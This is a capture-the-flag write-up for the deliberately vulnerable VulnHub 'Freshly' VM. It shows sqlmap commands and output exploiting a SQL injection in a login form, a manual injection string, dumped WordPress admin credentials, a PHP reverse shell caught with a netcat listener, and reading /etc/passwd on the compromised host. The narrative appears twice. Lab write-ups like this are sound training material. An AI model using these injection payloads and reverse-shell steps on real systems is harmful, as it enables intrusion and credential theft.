Mission `Freshly` VM : I downloaded the virtual machine hosted at https://www.vulnhub.com/entry/tophatsec-freshly,118/ . There are a couple of challenges from TopHatSec and I would like to try them both. Well for starters here is `Freshly` :-)
Detailed steps for getting root :
A nmap scan of the box reveals that ports 80,443 and 8080 are publically accessible on the box.
We quickly run both nikto and dirbuster against the webserver. We see that the VM is running a login application on port 80 while on the other ports it is running a wordpress blog.
We also see an installation of phpmyadmin on the webserver. We try the default credentials but dont succeed. Since there is a phpmydamin running on the box we guess that there may be mysql server running at the backend as well. Hence we try mysql authentication bypass by using a wronguser' or 1=1 LIMIT 1;# as username and junk as password. However we are not successful. Inspite of this its worth the effort to run sqlmap against the server to see if it can pick up some injection points either in the username or password fields.
Sqlmap tells us that the `user` parameter of the login form is sucesptibel to a mysql injection vulnerabilty. It readily exploits this vulnerability for us to give us a complete dump of the database when we use the --dump sqlmap option.
Excellent! now we can see that there are a total of 7 databases in the database. We must check out the interesting ones especially login, phpmyadmin, users and wordpress8080.
It seems that the table dump for the wordpress8080 database contains the admin password for the wordpress blog. We try to login to the wordpress blog via the credentials and we are successful!
Once we have admin credentails on the wordpress getting a shell on the box is extremely simple. By default wordpress will not allow any php content to be run from the wordpress articles/posts. However since we have admin privs on the wordpress we can install a plugin called Exec-php to allow php code to run in the wordpress pages.
We install the plugin to our wordpress installation and then follow the instructions at https://wordpress.org/plugins/exec-php/installation/ to run php code in the article body. Once the simple php hello world example works we use the php-reverse-shell script available at http://pentestmonkey.net/tools/web-shells/php-reverse-shell . We set up a netcat listener and sure enough we get our shell :-)
There we have our flag. A fun challenge indeed :-)
Detailed steps for getting root :
A nmap scan of the box reveals that ports 80,443 and 8080 are publically accessible on the box.
We quickly run both nikto and dirbuster against the webserver. We see that the VM is running a login application on port 80 while on the other ports it is running a wordpress blog.
 |
| Login prompt |
 |
| Wordpress blog |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| sqlmap -o -u http://192.168.116.135/login.php --forms --dbs |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| POST parameter 'user' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n | |
| sqlmap identified the following injection point(s) with a total of 111 HTTP(s) requests: | |
| --- | |
| Parameter: user (POST) | |
| Type: AND/OR time-based blind | |
| Title: MySQL >= 5.0.12 AND time-based blind (SELECT) | |
| Payload: user=VXNQ' AND (SELECT * FROM (SELECT(SLEEP(5)))BNMi) AND 'EOBB'='EOBB&password=&s=Submit | |
| --- | |
| do you want to exploit this SQL injection? [Y/n] y | |
| [05:29:12] [INFO] the back-end DBMS is MySQL | |
| web server operating system: Linux Ubuntu | |
| web application technology: Apache 2.4.7, PHP 5.5.9 | |
| back-end DBMS: MySQL 5.0.12 |
Sqlmap tells us that the `user` parameter of the login form is sucesptibel to a mysql injection vulnerabilty. It readily exploits this vulnerability for us to give us a complete dump of the database when we use the --dump sqlmap option.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| sqlmap -o -u http://192.168.116.135/login.php --forms --dump --dbs | |
| .... | |
| .... | |
| .... | |
| 05:54:23] [INFO] resumed: wordpress8080 | |
| available databases [7]: | |
| [*] information_schema | |
| [*] login | |
| [*] mysql | |
| [*] performance_schema | |
| [*] phpmyadmin | |
| [*] users | |
| [*] wordpress8080 | |
Excellent! now we can see that there are a total of 7 databases in the database. We must check out the interesting ones especially login, phpmyadmin, users and wordpress8080.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 1) TABLE LOGIN | |
| 05:53:38] [INFO] analyzing table dump for possible password hashes | |
| Database: login | |
| Table: users | |
| [2 entries] | |
| +----------+-----------+ | |
| | password | user_name | | |
| +----------+-----------+ | |
| | password | candyshop | | |
| | PopRocks | Sir | | |
| +----------+-----------+ | |
| 2) TABLE wordpress8080 | |
| Database: wordpress8080 | |
| Table: users | |
| [1 entry] | |
| +----------+---------------------+ | |
| | username | password | | |
| +----------+---------------------+ | |
| | admin | SuperSecretPassword | | |
| +----------+---------------------+ | |
| 3) TABLE users | |
| [06:03:42] [WARNING] database 'users' appears to be empty | |
| [06:03:42] [ERROR] unable to retrieve the table names for any database | |
| do you want to use common table existence check? [y/N/q] n | |
| [06:03:50] [CRITICAL] unable to retrieve the tables in database 'users' | |
| 4) TABLE phpmyadmin | |
| Database: phpmyadmin | |
| Table: pma_table_info | |
| [0 entries] | |
| +---------+------------+---------------+ | |
| | db_name | table_name | display_field | | |
| +---------+------------+---------------+ | |
| +---------+------------+---------------+ | |
| Database: phpmyadmin | |
| Table: pma_relation | |
| [0 entries] | |
| +-----------+------------+--------------+--------------+---------------+---------------+ | |
| | master_db | foreign_db | master_table | master_field | foreign_table | foreign_field | | |
| +-----------+------------+--------------+--------------+---------------+---------------+ | |
| +-----------+------------+--------------+--------------+---------------+---------------+ | |
| [WARNING] table 'pma_table_uiprefs' in database 'phpmyadmin' appears to be empty | |
| Database: phpmyadmin | |
| Table: pma_table_uiprefs | |
| [0 entries] | |
| +-------+---------+----------+------------+-------------+ | |
| | prefs | db_name | username | table_name | last_update | | |
| +-------+---------+----------+------------+-------------+ | |
| +-------+---------+----------+------------+-------------+ | |
| Seems the rest of the tables of the phpmyadmin database are empty as well . |
It seems that the table dump for the wordpress8080 database contains the admin password for the wordpress blog. We try to login to the wordpress blog via the credentials and we are successful!
Once we have admin credentails on the wordpress getting a shell on the box is extremely simple. By default wordpress will not allow any php content to be run from the wordpress articles/posts. However since we have admin privs on the wordpress we can install a plugin called Exec-php to allow php code to run in the wordpress pages.
We install the plugin to our wordpress installation and then follow the instructions at https://wordpress.org/plugins/exec-php/installation/ to run php code in the article body. Once the simple php hello world example works we use the php-reverse-shell script available at http://pentestmonkey.net/tools/web-shells/php-reverse-shell . We set up a netcat listener and sure enough we get our shell :-)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| nc -lvnp 4545 | |
| listening on [any] 4545 ... | |
| connect to [192.168.116.128] from (UNKNOWN) [192.168.116.135] 57118 | |
| Linux Freshly 3.13.0-45-generic #74-Ubuntu SMP Tue Jan 13 19:37:48 UTC 2015 i686 i686 i686 GNU/Linux | |
| 02:30:03 up 3:21, 0 users, load average: 4.19, 4.26, 4.75 | |
| USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT | |
| uid=1(daemon) gid=1(daemon) groups=1(daemon) | |
| /bin/sh: 0: can't access tty; job control turned off | |
| $ id | |
| uid=1(daemon) gid=1(daemon) groups=1(daemon) | |
| daemon@Freshly:/home/user$ cat /etc/passwd | |
| cat /etc/passwd | |
| root:x:0:0:root:/root:/bin/bash | |
| daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin | |
| bin:x:2:2:bin:/bin:/usr/sbin/nologin | |
| sys:x:3:3:sys:/dev:/usr/sbin/nologin | |
| sync:x:4:65534:sync:/bin:/bin/sync | |
| games:x:5:60:games:/usr/games:/usr/sbin/nologin | |
| man:x:6:12:man:/var/cache/man:/usr/sbin/nologin | |
| lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin | |
| mail:x:8:8:mail:/var/mail:/usr/sbin/nologin | |
| news:x:9:9:news:/var/spool/news:/usr/sbin/nologin | |
| uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin | |
| proxy:x:13:13:proxy:/bin:/usr/sbin/nologin | |
| www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin | |
| backup:x:34:34:backup:/var/backups:/usr/sbin/nologin | |
| list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin | |
| irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin | |
| gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin | |
| nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin | |
| libuuid:x:100:101::/var/lib/libuuid: | |
| syslog:x:101:104::/home/syslog:/bin/false | |
| messagebus:x:102:105::/var/run/dbus:/bin/false | |
| user:x:1000:1000:user,,,:/home/user:/bin/bash | |
| mysql:x:103:111:MySQL Server,,,:/nonexistent:/bin/false | |
| candycane:x:1001:1001::/home/candycane: | |
| # YOU STOLE MY SECRET FILE! | |
| # SECRET = "NOBODY EVER GOES IN, AND NOBODY EVER COMES OUT!" | |
| daemon@Freshly:/home/user$ cat /etc/issue | |
| cat /etc/issue | |
| Ubuntu 14.04.1 LTS \n \l | |
There we have our flag. A fun challenge indeed :-)
No comments:
Post a Comment